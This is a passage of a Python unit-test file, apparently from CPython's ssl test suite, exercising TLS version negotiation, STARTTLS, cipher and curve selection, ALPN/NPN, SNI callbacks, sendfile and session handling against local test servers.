try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
            s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
        d2 = b''  # bytes, to match d1 which was read in binary mode
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
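
    # A minimal sketch (added for illustration; not part of the original test
    # suite) of the retry loop real applications put around the
    # SSLWantWriteError / SSLWantReadError pair exercised above: wait with
    # select() until the socket is ready again, then repeat the same call.
    def _nonblocking_send_all_sketch(self, ssl_sock, data):
        while data:
            try:
                data = data[ssl_sock.send(data):]
            except ssl.SSLWantWriteError:
                select.select([], [ssl_sock], [])  # wait until writable
            except ssl.SSLWantReadError:
                select.select([ssl_sock], [], [])  # renegotiation wants a read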
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
        # Client waits until the server is set up, then performs the connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
        # Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if IS_OPENSSL_1_1_1 and ssl.HAS_TLSv1_3:
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
# client 1.0 to 1.2, server 1.0 to 1.1
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
# client 1.0, server 1.2 (mismatch)
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
@unittest.skipUnless(ssl.HAS_SSLv3, "requires SSLv3 support")
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
                # and compare with the peer's version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
        self.assertIn(stats['compression'], {None, 'ZLIB', 'RLE'})
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
        # SIGNED_CERTFILE2 ('fakehostname') was selected by the callback
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
            1 / 0  # deliberately raise ZeroDivisionError
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
